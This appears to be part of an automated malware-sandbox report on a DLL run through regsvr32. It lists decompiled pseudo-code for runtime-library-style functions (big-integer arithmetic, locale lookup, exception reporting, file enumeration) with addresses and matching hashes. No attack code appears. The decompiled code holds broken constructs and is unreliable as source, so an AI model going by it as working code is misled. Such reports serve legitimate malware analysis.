				_t171 = _t170 ^ _t197;
				 *(_t195 + 0x2d0) = _t171;
				r12d =  *__rdx;
				if (r12d - 1 > 0) goto 0x8004e7e4;
				if ( *((intOrPtr*)(__rdx + 4)) != 0) goto 0x8004e757;
				r9d = 0;
				 *__rcx = r9d;
				_t175 = __rcx + 4;
				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
				E0000000118005053C(_t171, _t172, _t175, __rdx, __rcx, _t195 + 0x104, __r9);
				goto 0x8004ea7e;
				if (1 == 1) goto 0x8004e750;
				r11d =  *_t175;
				if (r11d == 0) goto 0x8004e750;
				r9d = 0;
				_t173 = _t175 + 4;
				r8d = r9d;
				r10d = r9d;
				_t193 = _t171;
				r10d = r10d + 1;
				_t188 = _t186 * _t193 + _t171;
				if (r10d != r11d) goto 0x8004e780;
				if (r8d == 0) goto 0x8004e750;
				if ( *__rcx - 0x73 >= 0) goto 0x8004e7bf;
				 *((intOrPtr*)(__rcx + 4 + _t171 * 4)) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8004ea7e;
				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
				 *__rcx = r9d;
				_t177 = _t173;
				E0000000118005053C(_t171, _t173, _t177, _t188, __rcx, _t195 + 0x104, __r9);
				goto 0x8004ea7e;
				_t116 =  *_t177;
				 *((long long*)(_t197 + 0x430)) = __r13;
				if (_t116 - 1 > 0) goto 0x8004e8cc;
				_t113 =  *((intOrPtr*)(__rcx + 4));
				 *__rcx = r12d;
				r9d =  *_t188;
				_t219 = __r9 << 2;
				E0000000118005053C(_t171, _t173, __rcx + 4, _t188, __rcx, _t188 + 4, __r9 << 2);
				if (_t113 != 0) goto 0x8004e843;
				r9d = 0;
				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
				 *__rcx = r9d;
				E0000000118005053C(_t171, _t173, __rcx + 4, _t188, __rcx, _t195 + 0x104, __r9 << 2);
				goto 0x8004ea76;
				if (_t113 == 1) goto 0x8004e83c;
				r11d =  *__rcx;
				if (r11d == 0) goto 0x8004e83c;
				r9d = 0;
				r8d = r9d;
				r10d = r9d;
				r10d = r10d + 1;
				_t190 = _t188 * _t173 + _t171;
				if (r10d != r11d) goto 0x8004e860;
				if (r8d == 0) goto 0x8004e83c;
				if ( *__rcx - 0x73 >= 0) goto 0x8004e8a6;
				 *((intOrPtr*)(__rcx + 4 + _t171 * 4)) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8004ea76;
				 *((intOrPtr*)(_t195 + 0x100)) = r9d;
				 *__rcx = r9d;
				_t181 = __rcx + 4;
				E0000000118005053C(_t171, _t173, _t181, _t190, __rcx, _t195 + 0x104, _t219);
				goto 0x8004ea76;
				 *((long long*)(_t197 + 0x3e8)) = __r14;
				 *((long long*)(_t197 + 0x3e0)) = __r15;
				_t222 =  >=  ? __rcx : _t190;
				_t223 = ( >=  ? __rcx : _t190) + 4;
				 *((long long*)(_t197 + 0x28)) = _t223;
				_t209 =  >=  ? _t190 : __rcx;
				r9d = 0;
				_t210 = ( >=  ? _t190 : __rcx) + 4;
				_t114 = r9d;
				 *((long long*)(_t197 + 0x20)) = _t210;
				if (r12d - _t116 >= 0) goto 0x8004e912;
				r15d = _t116;
				goto 0x8004e918;
				r15d = r12d;
				r12d = _t116;
				_t117 = r9d;
				 *((intOrPtr*)(_t195 + 0x100)) = _t117;
				r14d =  *((intOrPtr*)(_t223 + _t171 * 4));
				if (r14d != 0) goto 0x8004e94a;
				if (_t114 != _t117) goto 0x8004ea19;
				_t41 = _t173 + 1; // 0x1
				_t118 = _t41;
				 *((intOrPtr*)(_t195 + 0x104 + _t171 * 4)) = r9d;
				 *((intOrPtr*)(_t195 + 0x100)) = _t118;
				goto 0x8004ea19;
				r10d = r9d;
				_t105 = _t114;
				if (r15d == 0) goto 0x8004ea0a;
				if (_t105 == 0x73) goto 0x8004e9bf;
				r11d = _t105;
				if (_t105 != _t118) goto 0x8004e97d;
				_t46 = _t171 + 1; // 0x1
				 *((intOrPtr*)(_t195 + 0x104 + __r11 * 4)) = r9d;
				 *((intOrPtr*)(_t195 + 0x100)) = _t46;
				_t106 = _t105 + 1;
				r8d =  *((intOrPtr*)(_t210 + _t181 * 4));
				 *((intOrPtr*)(_t195 + 0x104 + __r11 * 4)) = r8d;
				if (_t193 + _t171 == r15d) goto 0x8004e9bf;
				_t214 =  *((intOrPtr*)(_t197 + 0x20));
				goto 0x8004e960;
				if (r10d == 0) goto 0x8004ea0a;
				if (_t106 == 0x73) goto 0x8004ea46;
				r8d = _t106;
				if (_t106 !=  *((intOrPtr*)(_t195 + 0x100))) goto 0x8004e9e1;
				_t63 = _t171 + 1; // 0x1
				 *((intOrPtr*)(_t195 + 0x104 + _t214 * 4)) = r9d;
				 *((intOrPtr*)(_t195 + 0x100)) = _t63;
				_t135 =  *((intOrPtr*)(_t195 + 0x104 + _t214 * 4));
				 *((intOrPtr*)(_t195 + 0x104 + _t214 * 4)) = _t135;
				_t127 =  *((intOrPtr*)(_t195 + 0x100));
				r10d = _t135;
				if (_t135 != 0) goto 0x8004e9c4;
				if (_t106 + 1 == 0x73) goto 0x8004ea46;
				if (_t114 + 1 != r12d) goto 0x8004e921;
				r9d = _t127;
				 *__rcx = _t127;
				E0000000118005053C(_t171, _t173, __rcx + 4, _t190 + _t181 >> 0x20, __rcx, _t195 + 0x104, _t219 << 2);
				goto 0x8004ea66;
				 *((intOrPtr*)(_t197 + 0x30)) = r9d;
				 *__rcx = r9d;
				r9d = 0;
				E0000000118005053C(_t171, _t173, __rcx + 4, _t190 + _t181 >> 0x20, __rcx, _t197 + 0x34, _t219 << 2);
				return E000000011800028F0(0, _t127,  *(_t195 + 0x2d0) ^ _t197);
			}































                                                                                                              0x18004e6f0
                                                                                                              0x18004e6f7
                                                                                                              0x18004e6ff
                                                                                                              0x18004e706
                                                                                                              0x18004e70d
                                                                                                              0x18004e710
                                                                                                              0x18004e717
                                                                                                              0x18004e721
                                                                                                              0x18004e72c
                                                                                                              0x18004e72e
                                                                                                              0x18004e738
                                                                                                              0x18004e740
                                                                                                              0x18004e744
                                                                                                              0x18004e74b
                                                                                                              0x18004e752
                                                                                                              0x18004e75a
                                                                                                              0x18004e75c
                                                                                                              0x18004e762
                                                                                                              0x18004e764
                                                                                                              0x18004e767
                                                                                                              0x18004e76b
                                                                                                              0x18004e76e
                                                                                                              0x18004e771
                                                                                                              0x18004e783
                                                                                                              0x18004e794
                                                                                                              0x18004e7a3
                                                                                                              0x18004e7a8
                                                                                                              0x18004e7af
                                                                                                              0x18004e7b1
                                                                                                              0x18004e7b8
                                                                                                              0x18004e7ba
                                                                                                              0x18004e7c6
                                                                                                              0x18004e7d2
                                                                                                              0x18004e7d5
                                                                                                              0x18004e7d8
                                                                                                              0x18004e7df
                                                                                                              0x18004e7e4
                                                                                                              0x18004e7e6
                                                                                                              0x18004e7f1
                                                                                                              0x18004e7f7
                                                                                                              0x18004e7fe
                                                                                                              0x18004e805
                                                                                                              0x18004e80d
                                                                                                              0x18004e811
                                                                                                              0x18004e818
                                                                                                              0x18004e81a
                                                                                                              0x18004e829
                                                                                                              0x18004e834
                                                                                                              0x18004e837
                                                                                                              0x18004e83e
                                                                                                              0x18004e846
                                                                                                              0x18004e848
                                                                                                              0x18004e84e
                                                                                                              0x18004e850
                                                                                                              0x18004e853
                                                                                                              0x18004e856
                                                                                                              0x18004e863
                                                                                                              0x18004e879
                                                                                                              0x18004e88a
                                                                                                              0x18004e88f
                                                                                                              0x18004e896
                                                                                                              0x18004e898
                                                                                                              0x18004e89f
                                                                                                              0x18004e8a1
                                                                                                              0x18004e8ad
                                                                                                              0x18004e8b9
                                                                                                              0x18004e8bc
                                                                                                              0x18004e8c0
                                                                                                              0x18004e8c7
                                                                                                              0x18004e8cf
                                                                                                              0x18004e8da
                                                                                                              0x18004e8e2
                                                                                                              0x18004e8e9
                                                                                                              0x18004e8f0
                                                                                                              0x18004e8f5
                                                                                                              0x18004e8f9
                                                                                                              0x18004e8fc
                                                                                                              0x18004e900
                                                                                                              0x18004e903
                                                                                                              0x18004e90b
                                                                                                              0x18004e90d
                                                                                                              0x18004e910
                                                                                                              0x18004e912
                                                                                                              0x18004e915
                                                                                                              0x18004e918
                                                                                                              0x18004e91b
                                                                                                              0x18004e923
                                                                                                              0x18004e92a
                                                                                                              0x18004e92e
                                                                                                              0x18004e934
                                                                                                              0x18004e934
                                                                                                              0x18004e937
                                                                                                              0x18004e93f
                                                                                                              0x18004e945
                                                                                                              0x18004e94a
                                                                                                              0x18004e94d
                                                                                                              0x18004e952
                                                                                                              0x18004e963
                                                                                                              0x18004e965
                                                                                                              0x18004e96a
                                                                                                              0x18004e96c
                                                                                                              0x18004e96f
                                                                                                              0x18004e977
                                                                                                              0x18004e980
                                                                                                              0x18004e982
                                                                                                              0x18004e9a1
                                                                                                              0x18004e9b6
                                                                                                              0x18004e9b8
                                                                                                              0x18004e9bd
                                                                                                              0x18004e9c2
                                                                                                              0x18004e9c7
                                                                                                              0x18004e9c9
                                                                                                              0x18004e9ce
                                                                                                              0x18004e9d0
                                                                                                              0x18004e9d3
                                                                                                              0x18004e9db
                                                                                                              0x18004e9e1
                                                                                                              0x18004e9f1
                                                                                                              0x18004e9f9
                                                                                                              0x18004ea03
                                                                                                              0x18004ea08
                                                                                                              0x18004ea0d
                                                                                                              0x18004ea1e
                                                                                                              0x18004ea24
                                                                                                              0x18004ea2e
                                                                                                              0x18004ea3d
                                                                                                              0x18004ea44
                                                                                                              0x18004ea46
                                                                                                              0x18004ea4f
                                                                                                              0x18004ea57
                                                                                                              0x18004ea5f
                                                                                                              0x18004ea9a

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1502251526-0
                                                                                                              • Opcode ID: 98581697d9dbc3ccfd341ce1534d6375d9dc70796eb9a9659f2b8d15fbf82958
                                                                                                              • Instruction ID: fddd27b8f21620164de3f17fff90ea0c09261d0a41a060eeefedbaed3ab019b1
                                                                                                              • Opcode Fuzzy Hash: 98581697d9dbc3ccfd341ce1534d6375d9dc70796eb9a9659f2b8d15fbf82958
                                                                                                              • Instruction Fuzzy Hash: 1CA1D472604AC48BE7BA8F54E480BD977A0F36A7CCF51D115EB4A57B84DB34DA88CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C908 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 42%
                                                                                                              			E0000000118004C908(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				signed int _v72;
				int _v80;
				int _v84;
				signed int _v88;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				int _t60;
				intOrPtr _t61;
				void* _t71;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t88;
				signed long long _t114;
				signed long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t123;
				intOrPtr* _t124;
				signed long long _t132;
				signed long long _t134;
				void* _t145;
				void* _t146;
				signed long long _t147;
				void* _t149;
				void* _t157;
				long long _t158;
				intOrPtr* _t160;

				_t157 = __r9;
				_t139 = __rdx;
				_t71 = __ecx;
				_t114 =  *0x80070098; // 0xde2ac6aee6eb
				_t115 = _t114 ^ _t149 - 0x00000040;
				_v72 = _t115;
				_t145 = __r8;
				_t160 = __rdx;
				_t158 = __rcx;
				E0000000118003CFF0(_t115, _t123, __rdx, _t146);
				_t147 = _t115;
				_v88 = _t115;
				_v80 = 0;
				E0000000118003CFF0(_t115, _t123, _t139, _t147);
				r12d = 0;
				_t5 = _t147 + 0xa0; // 0xa0
				_t124 = _t5;
				 *((long long*)(_t115 + 0x3a0)) =  &_v88;
				_t116 = _t158 + 0x80;
				 *((long long*)(_t147 + 0x98)) = _t158;
				 *_t124 = _t116;
				if (_t116 == 0) goto 0x8004c98f;
				if ( *_t116 == r12w) goto 0x8004c98f;
				_t80 =  *0x80062160; // 0x17
				E0000000118004C888(_t80 - 1, _t124, 0x80061ff0, _t147, _t149, _t124);
				_v88 = r12d;
				_t117 =  *((intOrPtr*)(_t147 + 0x98));
				if (_t117 == 0) goto 0x8004ca18;
				if ( *_t117 == r12w) goto 0x8004ca18;
				_t118 =  *_t124;
				if (_t118 == 0) goto 0x8004c9be;
				if ( *_t118 == r12w) goto 0x8004c9be;
				E0000000118004C1D4(_t71, _t80 - 1, _t118, _t124,  &_v88, _t139, _t124);
				goto 0x8004c9c7;
				E0000000118004C2A4(_t71, _t80 - 1, _t118, _t124,  &_v88, _t139, _t124);
				if (_v88 != r12d) goto 0x8004ca8e;
				_t82 =  *0x80061fe0; // 0x41
				_t14 = _t147 + 0x98; // 0x98
				if (E0000000118004C888(_t82 - 1, _t124, 0x80061bd0, _t147, _t149, _t14) == 0) goto 0x8004ca84;
				_t119 =  *_t124;
				if (_t119 == 0) goto 0x8004ca0d;
				if ( *_t119 == r12w) goto 0x8004ca0d;
				E0000000118004C1D4(_t71, _t82 - 1, _t119, _t124,  &_v88, _t139, _t14);
				goto 0x8004ca84;
				_t132 =  &_v88;
				E0000000118004C2A4(_t71, _t82 - 1, _t119, _t124, _t132, _t139, _t14);
				goto 0x8004ca84;
				_t120 =  *_t124;
				if (_t120 == 0) goto 0x8004ca71;
				if ( *_t120 == r12w) goto 0x8004ca71;
				E0000000118003CFF0(_t120, _t124, _t139, _t147);
				_t134 = (_t132 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t120 + 0xa0)) + _t134 * 2)) != r12w) goto 0x8004ca39;
				 *(_t120 + 0xb4) = r12d & 0xffffff00 | _t134 == 0x00000003;
				EnumSystemLocalesW(??, ??);
				if ((_v88 & 0x00000004) != 0) goto 0x8004ca84;
				_v88 = r12d;
				goto 0x8004ca84;
				_v88 = 0x104;
				_t60 = GetUserDefaultLCID();
				_v80 = _t60;
				_v84 = _t60;
				if (_v88 == r12d) goto 0x8004cb69;
				asm("dec eax");
				_t61 = E0000000118004C708(_t124, 0x18004c068 & _t158 + 0x00000100,  &_v88, _t147);
				if (_t61 == 0) goto 0x8004cb69;
				if (IsValidCodePage(??) == 0) goto 0x8004cb69;
				if (IsValidLocale(??, ??) == 0) goto 0x8004cb69;
				if (_t160 == 0) goto 0x8004cae0;
				 *_t160 = _t61;
				r9d = 0;
				_t37 = _t157 + 0x55; // 0x55
				_t88 = _t37;
				r8d = _t88;
				0x80047928();
				if (_t145 == 0) goto 0x8004cb62;
				r9d = 0;
				r8d = _t88;
				0x80047928();
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004cb69;
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004cb69;
				_t44 = _t147 - 0x36; // 0xa
				r9d = _t44;
				_t45 = _t147 - 0x30; // 0x10
				r8d = _t45;
				E000000011800550DC(_t61);
				goto 0x8004cb6b;
				return E000000011800028F0(0, _t61, _v72 ^ _t149 - 0x00000040);
			}


































                                                                                                              0x18004c908
                                                                                                              0x18004c908
                                                                                                              0x18004c908
                                                                                                              0x18004c91a
                                                                                                              0x18004c921
                                                                                                              0x18004c924
                                                                                                              0x18004c928
                                                                                                              0x18004c92b
                                                                                                              0x18004c92e
                                                                                                              0x18004c931
                                                                                                              0x18004c936
                                                                                                              0x18004c93b
                                                                                                              0x18004c93f
                                                                                                              0x18004c942
                                                                                                              0x18004c94b
                                                                                                              0x18004c94e
                                                                                                              0x18004c94e
                                                                                                              0x18004c955
                                                                                                              0x18004c95c
                                                                                                              0x18004c963
                                                                                                              0x18004c96a
                                                                                                              0x18004c970
                                                                                                              0x18004c976
                                                                                                              0x18004c978
                                                                                                              0x18004c98a
                                                                                                              0x18004c98f
                                                                                                              0x18004c993
                                                                                                              0x18004c99d
                                                                                                              0x18004c9a3
                                                                                                              0x18004c9a5
                                                                                                              0x18004c9ab
                                                                                                              0x18004c9b1
                                                                                                              0x18004c9b7
                                                                                                              0x18004c9bc
                                                                                                              0x18004c9c2
                                                                                                              0x18004c9cb
                                                                                                              0x18004c9d1
                                                                                                              0x18004c9d7
                                                                                                              0x18004c9ee
                                                                                                              0x18004c9f4
                                                                                                              0x18004c9fa
                                                                                                              0x18004ca00
                                                                                                              0x18004ca06
                                                                                                              0x18004ca0b
                                                                                                              0x18004ca0d
                                                                                                              0x18004ca11
                                                                                                              0x18004ca16
                                                                                                              0x18004ca18
                                                                                                              0x18004ca1e
                                                                                                              0x18004ca24
                                                                                                              0x18004ca26
                                                                                                              0x18004ca39
                                                                                                              0x18004ca41
                                                                                                              0x18004ca54
                                                                                                              0x18004ca5f
                                                                                                              0x18004ca69
                                                                                                              0x18004ca6b
                                                                                                              0x18004ca6f
                                                                                                              0x18004ca71
                                                                                                              0x18004ca78
                                                                                                              0x18004ca7e
                                                                                                              0x18004ca81
                                                                                                              0x18004ca88
                                                                                                              0x18004ca9c
                                                                                                              0x18004caa2
                                                                                                              0x18004caab
                                                                                                              0x18004cabc
                                                                                                              0x18004cad2
                                                                                                              0x18004cadb
                                                                                                              0x18004cadd
                                                                                                              0x18004caea
                                                                                                              0x18004caed
                                                                                                              0x18004caed
                                                                                                              0x18004caf1
                                                                                                              0x18004caf4
                                                                                                              0x18004cafc
                                                                                                              0x18004cb08
                                                                                                              0x18004cb0b
                                                                                                              0x18004cb0e
                                                                                                              0x18004cb1b
                                                                                                              0x18004cb2e
                                                                                                              0x18004cb3a
                                                                                                              0x18004cb4a
                                                                                                              0x18004cb55
                                                                                                              0x18004cb55
                                                                                                              0x18004cb59
                                                                                                              0x18004cb59
                                                                                                              0x18004cb5d
                                                                                                              0x18004cb67
                                                                                                              0x18004cb85

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591520935-0
                                                                                                              • Opcode ID: 8028a76061b3122e43828895d7cffd717e70e32ff2aa1e33f61fdbe745a3d482
                                                                                                              • Instruction ID: d800f0e155d13a5b5d9f1973c0ee529838c66c7f9ef334be737342517fe22d05
                                                                                                              • Opcode Fuzzy Hash: 8028a76061b3122e43828895d7cffd717e70e32ff2aa1e33f61fdbe745a3d482
                                                                                                              • Instruction Fuzzy Hash: EB717E32700A088AFBD2DF61D890BED33A0B74CBCCF458126AE0957695DF38CA59C356
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001360C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 43%
                                                                                                              			E0000000118001360C(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				int _t39;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t83;
				void* _t87;
				void* _t88;
				void* _t90;
				signed long long _t91;
				struct _EXCEPTION_POINTERS* _t97;

				 *((long long*)(_t90 + 0x10)) = __rbx;
				 *((long long*)(_t90 + 0x18)) = __rsi;
				_t88 = _t90 - 0x4f0;
				_t91 = _t90 - 0x5f0;
				_t60 =  *0x80070098; // 0xde2ac6aee6eb
				 *(_t88 + 0x4e0) = _t60 ^ _t91;
				if (__ecx == 0xffffffff) goto 0x8001364b;
				0x80003864();
				r8d = 0x98;
				_t37 = E000000011800046A0(_t36, 0, _t91 + 0x70, __rdx, __r8);
				r8d = 0x4d0;
				E000000011800046A0(_t37, 0, _t88 + 0x10, __rdx, __r8);
				 *((long long*)(_t91 + 0x48)) = _t91 + 0x70;
				_t63 = _t88 + 0x10;
				 *((long long*)(_t91 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800136de;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) & 0x00000000;
				 *((long long*)(_t91 + 0x30)) = _t91 + 0x58;
				 *((long long*)(_t91 + 0x28)) = _t91 + 0x60;
				 *((long long*)(_t91 + 0x20)) = _t88 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t88 + 0x108)) =  *((intOrPtr*)(_t88 + 0x508));
				 *((intOrPtr*)(_t91 + 0x70)) = __edx;
				 *((long long*)(_t88 + 0xa8)) = _t88 + 0x510;
				 *((long long*)(_t88 - 0x80)) =  *((intOrPtr*)(_t88 + 0x508));
				 *((intOrPtr*)(_t91 + 0x74)) = r8d;
				_t39 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t83, _t87);
				if (UnhandledExceptionFilter(_t97) != 0) goto 0x80013740;
				if (_t39 != 0) goto 0x80013740;
				if (__ecx == 0xffffffff) goto 0x80013740;
				0x80003864();
				return E000000011800028F0(_t41, __ecx,  *(_t88 + 0x4e0) ^ _t91);
			}














                                                                                                              0x18001360c
                                                                                                              0x180013611
                                                                                                              0x18001361a
                                                                                                              0x180013622
                                                                                                              0x180013629
                                                                                                              0x180013633
                                                                                                              0x180013644
                                                                                                              0x180013646
                                                                                                              0x180013652
                                                                                                              0x180013658
                                                                                                              0x180013663
                                                                                                              0x180013669
                                                                                                              0x180013673
                                                                                                              0x18001367c
                                                                                                              0x180013680
                                                                                                              0x180013685
                                                                                                              0x18001369a
                                                                                                              0x18001369d
                                                                                                              0x1800136a6
                                                                                                              0x1800136a8
                                                                                                              0x1800136bb
                                                                                                              0x1800136c8
                                                                                                              0x1800136d1
                                                                                                              0x1800136d8
                                                                                                              0x1800136e5
                                                                                                              0x1800136f7
                                                                                                              0x1800136fb
                                                                                                              0x180013709
                                                                                                              0x18001370d
                                                                                                              0x180013711
                                                                                                              0x18001371b
                                                                                                              0x18001372e
                                                                                                              0x180013732
                                                                                                              0x180013737
                                                                                                              0x18001373b
                                                                                                              0x180013766

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1239891234-0
                                                                                                              • Opcode ID: 6ba515eba41eaaca452e69af42adb324a6a894a9702a571db70db0aee1680c9a
                                                                                                              • Instruction ID: fda6f859b8bf68d8055e98cc49fc938b7da6a16bf3d58113224d79175d4a0c86
                                                                                                              • Opcode Fuzzy Hash: 6ba515eba41eaaca452e69af42adb324a6a894a9702a571db70db0aee1680c9a
                                                                                                              • Instruction Fuzzy Hash: 89317276214F8486DBA1CF25E8413DE73A4F788794F508126FA9D43B99DF38C25ACB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180043464 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 55%
                                                                                                              			E00000001180043464(void* __rcx, signed short* __rdx, intOrPtr* __r8) {
				signed int _v72;
				intOrPtr _v616;
				signed short _v618;
				char _v620;
				void* _v664;
				intOrPtr _v672;
				long long _v680;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r15;
				signed int _t26;
				signed int _t35;
				void* _t41;
				void* _t45;
				signed long long _t55;
				void* _t57;
				void* _t59;
				signed short* _t72;
				void* _t86;
				signed long long _t87;
				long long _t95;
				signed long long _t97;

				_t55 =  *0x80070098; // 0xde2ac6aee6eb
				_v72 = _t55 ^ _t87;
				if (__rdx == __rcx) goto 0x800434bc;
				_t41 = ( *__rdx & 0x0000ffff) - 0x2f - 0x2d;
				if (_t41 > 0) goto 0x800434b3;
				asm("dec ecx");
				if (_t41 < 0) goto 0x800434bc;
				_t72 = __rdx - 2;
				if (_t72 != __rcx) goto 0x8004349d;
				_t35 =  *_t72 & 0x0000ffff;
				if (_t35 != 0x3a) goto 0x800434e3;
				_t57 = __rcx + 2;
				if (_t72 == _t57) goto 0x800434e3;
				r8d = 0;
				E00000001180042F88(_t59, __rcx, _t72, __rcx, 0x801, __r8);
				goto 0x800435d1;
				r12d = 0;
				_t45 = _t35 - 0x2f - 0x2d;
				if (_t45 > 0) goto 0x800434fb;
				asm("dec ecx");
				if (_t45 < 0) goto 0x800434fe;
				_v672 = r12d;
				_v680 = _t95;
				asm("dec ebp");
				r9d = 0;
				FindFirstFileExW(??, ??, ??, ??, ??, ??);
				if (_t57 == 0xffffffff) goto 0x800434ce;
				if (_v620 != 0x2e) goto 0x80043560;
				_t26 = _v618 & 0x0000ffff;
				if (_t26 == 0) goto 0x80043579;
				if (_t26 != 0x2e) goto 0x80043560;
				if (_v616 == r12w) goto 0x80043579;
				if (E00000001180042F88(_t57,  &_v620, __rcx, __rcx, _t97 & (_t72 - __rcx >> 0x00000001) + 0x00000001, __r8) != 0) goto 0x800435c6;
				if (FindNextFileW(??, ??) != 0) goto 0x80043540;
				if ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3 !=  *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3) goto 0x800435ab;
				FindClose(??);
				goto 0x800435d1;
				r8d = 8;
				E00000001180052120(0, _t57,  *__r8 + ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3) * 8, ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3) - ( *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3),  *((intOrPtr*)(__r8 + 8)) -  *__r8 >> 3, __rcx, _t86, _t97 & (_t72 - __rcx >> 0x00000001) + 0x00000001, 0x18004247c, _t97 & (_t72 - __rcx >> 0x00000001) + 0x00000001);
				goto 0x8004359e;
				FindClose(??);
				return E000000011800028F0(_t27, _t35 - 0x2f, _v72 ^ _t87);
			}



























                                                                                                              0x180043476
                                                                                                              0x180043480
                                                                                                              0x18004349b
                                                                                                              0x1800434a4
                                                                                                              0x1800434a8
                                                                                                              0x1800434ad
                                                                                                              0x1800434b1
                                                                                                              0x1800434b3
                                                                                                              0x1800434ba
                                                                                                              0x1800434bc
                                                                                                              0x1800434c3
                                                                                                              0x1800434c5
                                                                                                              0x1800434cc
                                                                                                              0x1800434d1
                                                                                                              0x1800434d9
                                                                                                              0x1800434de
                                                                                                              0x1800434e7
                                                                                                              0x1800434ea
                                                                                                              0x1800434ee
                                                                                                              0x1800434f3
                                                                                                              0x1800434f9
                                                                                                              0x180043501
                                                                                                              0x180043511
                                                                                                              0x18004351b
                                                                                                              0x18004351e
                                                                                                              0x180043526
                                                                                                              0x180043533
                                                                                                              0x180043546
                                                                                                              0x180043548
                                                                                                              0x180043550
                                                                                                              0x180043556
                                                                                                              0x18004355e
                                                                                                              0x180043577
                                                                                                              0x180043589
                                                                                                              0x18004359c
                                                                                                              0x1800435a1
                                                                                                              0x1800435a9
                                                                                                              0x1800435b9
                                                                                                              0x1800435bf
                                                                                                              0x1800435c4
                                                                                                              0x1800435c9
                                                                                                              0x1800435f2

                                                                                                              APIs
                                                                                                              Strings
